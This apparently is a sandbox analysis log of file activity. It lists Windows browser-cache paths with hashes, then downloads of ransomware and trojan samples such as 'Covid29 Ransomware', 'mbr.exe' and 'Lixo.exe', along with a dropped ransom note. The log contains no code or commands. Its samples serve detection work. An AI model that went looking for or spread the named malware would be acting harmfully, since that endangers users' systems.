| SHA512 | 89deb5df97f040a372fb71a01edbf79592f0d349e153028b1dc7250f6b62e948d944fa173fb0678394fde45a91b5da0959c03207ef1b3adf8f1dc57136f2d3b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | e27ecb134987b3be8fb7f325d8fb4a22 |
| SHA1 | 0b27e4afa4ba769fd3e2bf8b424235b9ac855d97 |
| SHA256 | 98a6f52fbfde890d37c28e47cf960131a7ea1074dc8d5d436a73d209640863fa |
| SHA512 | 7ad26daea91e32daa6c12b19519f1a207d1616689cad9844282c19611bde6704508ea15c6cc155a244afbf4a950cffd859648b290969a84c4d9dadeeb72bd87b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old
| MD5 | dcc4187debd3e73766fa9c72240c373e |
| SHA1 | bafd3c00a49f65c56be1faa2a474fd88ef86f05d |
| SHA256 | e759fa55a00514e3d78f347b019f4b7349e2b11c77045764329307cd49bc790f |
| SHA512 | 7171a18b523e75c8bcf582b29f19994f850e326cff43e6455711fcb3804bc270a56f09681a31c2e6bfa5a5dff6c56e15390eb6e4f3fad907fd925bc2ae44981c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 20a832c486a74f4fa1b77b1069f6fc58 |
| SHA1 | aa20cb39e46513248ed0cc82b3bf2b90c70d9e29 |
| SHA256 | 55093cd79454608a7c8a19774c21bc3944406f1eb424105e5aabe035cdb3792f |
| SHA512 | b5336f6741d4e7c6a37044d915a9cbc9fd65e16a5061c9ce8b85508a9c2dc06a84cfd7949bd775e98ef4225867a8b3f38efcb71edbad91c4548d18004e4c968a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 148241c5976df8ef42c797ac04f49cf8 |
| SHA1 | dd33a5204df7c57047df6290640d950890a89c1c |
| SHA256 | 95bcb9488c2af12d1c3aa30e075823b4dff4efeafa3db5dea641ca16286c08b8 |
| SHA512 | a86152c95a506228522087e92c08dcad14a034de7637d35f8e6656dac2451b3d009936443e7edecab7281f9be5a30992a07f281c158fd1c8b2071529856d082b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000056
| MD5 | 1721006aa7e52dafddd68998f1ca9ac0 |
| SHA1 | 884e3081a1227cd1ed4ec63fb0a98bec572165ba |
| SHA256 | c16e012546b3d1ef206a1ecbbb7bf8b5dfd0c13cfeb3bdc8af8c11eaa9da8b84 |
| SHA512 | ff7bfd489dc8c5001eea8f823e5ec7abf134e8ad52ee9544a8f4c20800cb67a724ec157ca8f4c434a94262a8e07c3452b6ad994510b2b9118c78e2f53d75a493 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049
| MD5 | 086122a4bfb7a51510e3f0f0358446c2 |
| SHA1 | 409d7940193c0a6201fb28376f9ca1ec4e09d979 |
| SHA256 | 3c982a4b7283f4a728760190c40feaef16cceafab2f04f372c7848ff1b65c270 |
| SHA512 | 1db1eb3cc8fa2fea162297b95d6f9d5fff99d2ddecb2e5a70eee014585f6c51550816dff2b295aa268e7040c5414c89c6c7d45f0c924a612dd98ff4e7974c309 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004d
| MD5 | 6351ed39b222eb879b007399ba302bb4 |
| SHA1 | dd337a61210f5b131aeafa82877ec326d66aa0d9 |
| SHA256 | d2d9005faab30f8724eb2b0f270168501d38a65860c012061c4b4e34d1406ba2 |
| SHA512 | c58e87382315a61ff8d8c8023eb47aa794e7f2ddf803e83e2e45dab83cd1cf58288e5ed2ee9a5047876bf31388f5e4536831659bc454c130496df75015dac384 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000059
| MD5 | baa80a18dd87df5735d95654441feed0 |
| SHA1 | e600bd34f9822eacbe76dccac24d70178a839d2c |
| SHA256 | cd12b1ca0960d19a282b891a804a3c21729d00ef26ea23b674e908465d4a691a |
| SHA512 | ba381c34f3be056d6d44debc209d97921c2bdd8e3af66a8a899e4ba2b67d163395789e32aae31ee80c7d0d0c35685c01d1e734ebcb7645ffa54a72f0729adab2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005e
| MD5 | 9db75af2ae54430b2c88c452b4d66505 |
| SHA1 | 805a267ffe69bc89075066761742682e32461a47 |
| SHA256 | 921262b9d71dc673eed53926026576bdfd85b2f3192e12ec3931de84d48a8b33 |
| SHA512 | bacaa8f5afdca197f3642bb4f673321a6448c5e6c10cd10624cd214b3c0a0e8976d542efa2c9724360cfa7116f129b4f6a456dc3ed718cb8d75632ab55c89a44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 970c77dc0ba8845a60ed4c0377527640 |
| SHA1 | 2532e190bfc26b5ea82ab77761ee5eae4c499d9e |
| SHA256 | 902e2e16c9321fe839d389ee07e66f0dc485d5fa44c966a568d95680e3e37165 |
| SHA512 | 2a02701eaf75c05994867f3d261bdb6448b87e75a89cf21b94f52dffb0f50f17382fd0fd1900e32f0c33e0ca43d4b59c50f864f80a63d3b38a4396652b0be014 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fdf92250e0ffcf05eada6c320caa6c4d |
| SHA1 | 9c903b7594e6e0485265b7d62857584b858daa4f |
| SHA256 | c7814a49cbe941126c1a4ef78a23d54d07fae532614ad08be1cb54498125e6a4 |
| SHA512 | bf95c4689fb1428c55b90ebab58a5d13f9ac0562b3ae6cb98b33cad4f70fef36b733d582ac545c53102af91035064abdb3c254004601c3bf4bec901b88e11a1b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | a6ad06125f967a1a0816a6d88035f67c |
| SHA1 | c204065cb48fa7c59b420de07258bb6a4606ba7b |
| SHA256 | ad327aef24b432f01256077b978e28f605fc8bd0329cf0a1aa762b33ef981ae0 |
| SHA512 | 5f17b623cf153b26a7244b4969540516d0f12becfac1208e069f3b0055c2dbebb7a37bedd80ceb84d1df459ab9fa06d09830a2cd5e8396c9ad1349dfca43eebd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004e
| MD5 | bcd709bd87ba943a1658a8fb588450fe |
| SHA1 | 57599251ba1c27016a5d5d937f6b549efe2cdec1 |
| SHA256 | d86116737e093cd6373383a75a576e72ca616d5050dc1980bf4305e4a24e4c9a |
| SHA512 | 71ce6c566b58c88c9bf853cc5bb27fb0b518c477ab806039d0bc6fd9b038e4df95a6050a4b9051d45c004f6b998f723fc97ed5235aaf766b6ac3b3137a0663b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c
| MD5 | cb09153ae0f969ef30c093fa4a934581 |
| SHA1 | bf864742df735c295b0e060bf4353f6c523141c5 |
| SHA256 | ee3546de764dfdf26e685a60249a7e1a52ea071fd7f433fff5cfbddbabccb553 |
| SHA512 | f03f272302643ab3d3cfcca02047c0182f3f30ef1aa269212ed7c40523a380fbd6e88c0a3cd1270a41c0360269b1756ddfb6ebed551325f78db676fbc2d52d08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000050
| MD5 | 0564b5a8e203ba80cf092aa8dfb3cd06 |
| SHA1 | 7201078c0b8cb3e32e39ae5f1f448074fe6afa37 |
| SHA256 | 3cfda5ff454bd3d2bca33510f3cccb30ba40aed6e0e9c41c754466ff6ca7f15c |
| SHA512 | 86cde72670f99c98ee49613cb75eb8048ed3485b8f55b629dde25777670fd076d6eaecd1d866531a060f0e7d907028b17eefbc35f2ddfcf2c73d409dcb3965cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004f
| MD5 | 4b4ca8541bd16c226334c7f9d69e38d2 |
| SHA1 | b9d3ecc23a290fd0d30d8696448c0a836ad9097e |
| SHA256 | d6332781e45dbdda8cda2167703fda5e5016b8c37d87d91a9bd9d665053eb1d8 |
| SHA512 | 6c4bd496022248df4ed6e90b27ed6690a5e7e1183fad9f2c65aa61ebb964f755eee2ab775072ee89f9d7ceeb0bb7eaf294661b6cef3def935f79ea844e089884 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\22813b72043b9677_0
| MD5 | 5457bcc699921ff4218ec7e319eba1f2 |
| SHA1 | 956fb4241de8851d48c6e7dbe6eeaf6f92f762d4 |
| SHA256 | ad8d9e5144fac37fab76ec5d6fc9df03770ef9a313cedf2e6d38df7e9c089479 |
| SHA512 | 8b150b6c61d8eaee0196a4eafce6e05086c62c0bce22ede70c84680a10fcda4a3575fb977fc778f2002ed62bd6b858063544be29753d5859955f63b2afb7f585 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5dd0ad6188a1b357_0
| MD5 | 3501e373e41e729769edbedf8abd7dac |
| SHA1 | 3202248d9ae5312fe9cd53b471ddfe1079cc2dbc |
| SHA256 | 9c8065f324a3f0b341627c667a6640d7f78e2ea7b7b3c77e7d6595a2cd0da683 |
| SHA512 | a848e44adb548b02923bb7fda01b33d2a443da6aefe4de85258b7abfc686b799337edf4e33604b5de0af297c53ac703d20d89a8a31898ba5f1493fb71ec8d3e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\68c82e0a24778f12_0
| MD5 | 923b0c857235889ee63c8faf9b981622 |
| SHA1 | ee2213f9b3836209a6f104d9f9d1ecd558a6fbbe |
| SHA256 | 8911985c5dc9c2ca8ba689a7db1902069eacaa06a0665a3d756d82a8d7c5d736 |
| SHA512 | afaffc7f04c8969ec0ca23988155b7d9581a32d417b01031e6274d414877c3d86e2c705121a2044009fe0b346c47ad7ed45a3c44171d37e5d4634acf911c37e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8d0cf53909ea22dd_0
| MD5 | 97f3aa6788309c7c1fee7e12d41750c4 |
| SHA1 | de9c53f9dfefc9faa289f5c24cf54b8bcc2cbbbe |
| SHA256 | 0a8e9d63c543865bce41bbe94e3e02862a7f7d080877cf0f6c49f3658f801180 |
| SHA512 | c45fc608d2e029964352e7dc3566a589c7c8ba0cfd7d89071d19b254aa51387a6685b2ab0e9bedf2df8f2a04924d7f164a90cf8d69af7006bc56d037fc2c4c1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036
| MD5 | 656abcd278e8ccb670d731ab234f36fb |
| SHA1 | 7890827918667198da32ef043bde58935df636c2 |
| SHA256 | a00c214b105544b2f6cfd7406d5471383e41cb12b2239195a39ff20308800a47 |
| SHA512 | c68cda33ae76525b2ae541691dd3ed17e1d7d8a164c4ece93aedf3d942ae19fbcd3b150558f877b65c6e8f7c584b39ac8fc2cf4905ab60a8ff758a0377c452de |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\1830cdccf2b86ddd_0
| MD5 | 6f632b2ec4e0409b4daa23a0843b29fa |
| SHA1 | 75ed4e7c8db8744315f3855e88ead1a153e3c6a5 |
| SHA256 | 1918c5f401cf1deb38beddd8ef62b5ba3ab7a928836c1799bef09dca74507a37 |
| SHA512 | 97dc378710da4a9dea677e48f7728f9d810a0c70fc07da4bf83d5480fefdee9634d8142ab9e6971b0353dc651bad8fdfb65a93820032289514e8c223724bc286 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\32cb37ab-b489-4573-a033-b4ed1f1ae092\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 803bdc9341913765ff4d36b456746c7a |
| SHA1 | 46ad593e22c74c0cd576df36b6966b44324f46a9 |
| SHA256 | dffd77be70a9f3240bcff1016f370ae8bccdd910c1825dc6921362cc9b36ab53 |
| SHA512 | 61f0ba2463d69c6bb272aefdac7a4fa498a37ec856e2318c2f893fff41837cd52aed49d1eef37a3fdd8a1391d2aeb427b194c51cf2ee2979a045289ca8d306f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old
| MD5 | acecd47462c8a9c783a12c885eed0639 |
| SHA1 | 8a6ca9c015e000e1e501e420b963f5b2c40947b9 |
| SHA256 | cc4224fe5e3fb3be38a888a076c996d6a131052a48d1343dd224dd101d9d4c7f |
| SHA512 | dd9125bc36e6d6dadc5f9547093c2685c769374a8a8d5507b08c13105d7b1530e6c80aafbda209e07df30ed5660983f79d91affc151441b359493a86d1dd3413 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e6ca66a25a87330633f2ace1176beb4b |
| SHA1 | 1f2e20fa483caab40bb58929c8d08ac415e1efa3 |
| SHA256 | 6e0e835ce1b78e42e0f8c5c4e89cd596a75161569a054cbd0cdc12d0765d662c |
| SHA512 | 2edf40f310dfcece79dca6241b723d7a5a015d40681075fa9d95504e7abacf5676434116b6e5e90207109bd33ba1e05e9dd1d3f34309bdfaa9fefddfdf3aa86d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\dee4f29a7f0f5480_0
| MD5 | 1a7191b5a10db0b1a1717aa39154f65e |
| SHA1 | 5792a2a337a074f8ebfea2973784ea5712d3decc |
| SHA256 | c600b4733e009b5e1655454291d8c479e39c89f45773e31d745ab5e96bd70de2 |
| SHA512 | d0db1107c0a5908c8b32843c46c2e0e31bf1e8fafc20645c54b0b361073588ddb20d5c2638688af59bc6b8a4af4cc39a67128e02762976b35ae9bd397cfa2c5a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4cd463e59caa4420_0
| MD5 | 4a4983a36026dc83e812a3bf435aad79 |
| SHA1 | 947968ee82b55326059567268410bb2a65f5c8ec |
| SHA256 | e4a70329f952eca33e3a2fbaa3576a866a0496b2b6d0e8fabd218401dbc37d6d |
| SHA512 | 98db4c2d25988f39306a7e5fcfd6202a067a97102bf8e8aa9ef84d21d6c539f433a853b434b9fb6243d2f87b5ec7fce9bf3c7dd147813d3aba1ea5e9cc16eeca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\36272a3a395a4b28_0
| MD5 | 2d27ee0aba4b8c10aea557dcf4502f20 |
| SHA1 | ac0c0abb0a1704a10b0e4de07dbafe4b3e47e450 |
| SHA256 | 22854f750196aa907eabea8052b83a672e6a33ee7f9233f4a19acb5354921aa7 |
| SHA512 | b15b64dc987230c347f617b10fe121b4a9a3d158fbb464e2586f19d2e121a6206c740b646f1ad0058c8d1bcc53b9f802742f57e317a7a8a48beab6fb269302e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\503f535d81b10699_0
| MD5 | ec34ef221291aa3d3cf90253344aed62 |
| SHA1 | ff2224fe7059ee1ebf8157b92978c45e6b67ab84 |
| SHA256 | 5f999e3bffe8a23e7f803e11a197360cb374b123a6d92c573a0d67cf7b9b0318 |
| SHA512 | e83198d105cd83e4a8805af405d202e5eaf9364106b03dde8bb54fde37427b3adabbb8127ec9944dfe607568906ae6ac32845d2258bfb7755ebc7cf84dbeafc8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\32499183bcac3c97_0
| MD5 | 30059794f39c7445cadf33630638917e |
| SHA1 | 7459901bfdba30c60fe983310057a4f25ef76196 |
| SHA256 | 3abb04348eb75f46f31a3a1192c1f9b9c63763a1e6e56511a04f9c04282e0744 |
| SHA512 | e534b68e786bc8555e9c547f01092153347ffb85219304523a3df4ac3582f05de2f01f250d8724c89c3f9822f67af7c4f86ad463cee1fcca3ecfa08b7ea32f09 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\01d24d6051e13bc0_0
| MD5 | 78265e63dade6a61ea63da207127601d |
| SHA1 | e1c784bd3816eceecc980927be1bc45a27810e0d |
| SHA256 | 6295fef9acda056d703f91cfcf9525fee1aa4e5411dec4da22651d7a4ab98262 |
| SHA512 | 7671c1ba32bae370e4a6f18c68de20974979a38a481bfa9aa9c43690079fdf1a379367dec2c93198e9916681797143c8c9194db8c27a85f6e036089c17b6df68 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | b08fc77c51d26f655750954aaef669a5 |
| SHA1 | 8c46e32a417e9d3becdf2308a55d55bda556e90a |
| SHA256 | 647c42c760ace32b43891be6b94b0ac94cc6252dcf4e959b2bbed7bc3dc0cbc1 |
| SHA512 | e56cf1cbbdbcf9d145c886414b84d1da6e8ede245af68cb289c57c1e4cbecf3b69e7abbbe8a69f26fcc67d4291f1737515bb54aa2d8f148d1af6d0f9605b26df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\59565ab62866c161_0
| MD5 | f9301e6bcab137c670b3cbe19ff209ae |
| SHA1 | 8e4601870a0647fdf93783896a9d23cc2f7940f4 |
| SHA256 | f89a560a56c5a761602e4b9d6aded61c147487796bc0abaf8c6e8497a1fa0d02 |
| SHA512 | 2bbef3b73c2406a09dde169e44108882b79e870f09506f4b7409a7da7ddc0db1315519009f76fe5872184c99e45ae311beb2b413ca025f02863b65c04b90a601 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\53150769611d904d_0
| MD5 | 63b6829919c4696da60497ccf2306017 |
| SHA1 | 18ba97cf9b2796fee8d81663ca1104025c827745 |
| SHA256 | 362921074e6b115c14233a749909c10d09cc1fe89d75a5939ad6aaffff18dee1 |
| SHA512 | 38ff8d426df5b8fb8c5512025c2d204e83ee648bce2cbfe5c46fa4caeb80754e0e5f3b6fe68f040e69f5ea81c1a0cc587ef4f6e369ed7fbdedaef79c4f3490af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\335e69ddec2b9ac6_0
| MD5 | b7eaf8f63d8b6101520a152d02b139da |
| SHA1 | d59700ba8dac87874a3d8130aa70756b86ac0fe5 |
| SHA256 | 8a7a857e7283169653f1f112d43518979cbd366877cdd632646ff7d9983591f1 |
| SHA512 | 4b35256e0793c114ab7ffea97980ecc69467662dbec55a3a0827ea51033ddcc31c850bab3e2bc06fdd5e4893ea47fdb7114d5566984920e79916d8724bd16002 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e9545717e6d151d2_0
| MD5 | 8b73ab4f96a87837a753a4cff97ce44e |
| SHA1 | 195e6a444d6189dba15abd81ec1eb578db5801db |
| SHA256 | 51ef783ce3652e2b45990bd60bf820adabef5551b1cf24375c2173a4b1ddd6fd |
| SHA512 | d34f56fa8ffa9fe266910e46e4607afa31d1491aed1c33c655ec6dbd0046bbbbf3f8f6ca3d476e30b63f6603fa993ed02a43eefa48d5598c4682f25610b49454 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 15c4a9ab4e51d3e5de8f404c93d574eb |
| SHA1 | 21181ecba4119d96294e548b8b3314bd23b84f75 |
| SHA256 | 370261701ea2995dfc508c5a6bac3a5ea6223156ea6df83b77543a4fa6ff6511 |
| SHA512 | 53526283d33497a0e4f82e0be0626a3db5613b575b94fca034c7ba4356be8ffc4ba486835fc970f945b6c3ae119d7b4a38654a468e3788be9df71560084246a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b97314ad320ba71638201dee92a08922 |
| SHA1 | 09d0e643a88dcee24c8b21dfaae80afebd970c26 |
| SHA256 | 5f4f38c8428247596df41da65278b84a69d31077052c6a03c384586df54f5b70 |
| SHA512 | 52b053b0ef9cc712b6799045a2d5c64647843ef7bfedc6698321c0f477afea8868a55e6029d9aa413bc7eab05221a721adcf08ab60179fe8a20d665e6d93e603 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6e94ece5-9f16-46e5-a609-8f5e8f214ddf.tmp
| MD5 | 4842a6b39fec93bc65191274820ba412 |
| SHA1 | c88ab1a4696cdce30447ab17de8ce795bd29db4f |
| SHA256 | ae3168a0cf49200b9e33907cfd7d62d0e6e0fb7913e6f6422c144a92e555ba7b |
| SHA512 | bdb680315b4b82ee87f100cb5966f21a910654b2d2df09ba134e7661fbd327c01460fe3edc6f25c458ef9ff0e93b0fcdc0184c051a330c22dc173107da0b042a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b3e179364cba4e07a42583b79084b506 |
| SHA1 | 2792c6b0c9be3ed2d63ff96bf18eaa7b6db1a416 |
| SHA256 | 1035a42108d4c1d4424aeddb13b2f05214cc920f2c6aa2e9cb614bab7dd8b773 |
| SHA512 | ab7cbe6c5aaaecb4c7ea02748f1c2dc3616f0533ad97e1376b7da7e1f716b21458c8d0adf45b68dcf7b94d6cc007373595156ea80dc1e6670d187e59b98c93e1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0a02ba264f938658e5f92222dc8bc13a |
| SHA1 | 3392f816f7243ae4a7c80fbe405c0fb8f4e274b0 |
| SHA256 | 171be2749a78fb58423dfc7cb97aa1a465e493ce0d186c6ff22f16d1ef192a92 |
| SHA512 | 0d91585767a551649afb70f754b4d3bf14cb4051bf5a208ba795798646f1c3987828b2b531b46c46db1296f626808be860b0ead9620cd6219caf87b856a00210 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 33d8eebde9c33f36af51a36281e3eb95 |
| SHA1 | 001959a7b55fdcc9dc99ba72f36439c4bafd9418 |
| SHA256 | 2cebecae552ef3e9ab44454fe9e14970bfc7b90f6dc98135756867543dae8513 |
| SHA512 | d8dc179347baee7ef4f731787074fe9e1b033def4cec8b6798266b988c0cda1fb3b31b818f6a1660b86657360539e4649fc8324c832092a4463d5817039111a0 |
C:\Users\Admin\Downloads\Unconfirmed 664769.crdownload
C:\Users\Admin\Downloads\Unconfirmed 732348.crdownload
C:\Users\Admin\Downloads\Covid29 Ransomware.zip
C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
memory/4332-2666-0x0000000000400000-0x00000000005D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\mbr.exe
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe
memory/1684-2690-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/3052-2691-0x00000000007A0000-0x00000000007C0000-memory.dmp
C:\Users\Admin\Desktop\covid29-is-here.txt
memory/4332-2785-0x0000000000400000-0x00000000005D5000-memory.dmp
C:\Users\Admin\Downloads\MS 0735.6+7421.zip
C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe
| MD5 | b13850aceaf6c1ee66c61bc94135fa25 |
| SHA1 | f23280f6bec2f097ddf77b97bb19b643a2c5a80b |
| SHA256 | ae2a43a7d58e9766fac59032ba1ecf1df7866ce5bc09b879c6bb111036789ed2 |
| SHA512 | d4344edb6e4a460e162169e5621fbf851538c70c6489cca034d1600c3a9a677e8cfa0607e464ea8de3a22066928f540833bc10bf18ae3b1ec7e9147c0d3a897b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\Downloads\Unconfirmed 539169.crdownload
memory/184-2912-0x0000000000400000-0x00000000004B8000-memory.dmp
memory/296-2913-0x0000000000400000-0x00000000004B8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
memory/184-2942-0x0000000000400000-0x00000000004B8000-memory.dmp
memory/296-2943-0x0000000000400000-0x00000000004B8000-memory.dmp
memory/296-2944-0x0000000000400000-0x00000000004B8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\18c417df-4d7f-4fee-8ea8-f30e0e3e0fbf\0
C:\Users\Admin\Downloads\Solaris 2.0.z01
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\Downloads\GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\18c417df-4d7f-4fee-8ea8-f30e0e3e0fbf\2
C:\Users\Admin\Downloads\KitteyHacker.7z
C:\Users\Admin\Downloads\Sigma.zip
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
memory/184-3368-0x0000000000400000-0x00000000004B8000-memory.dmp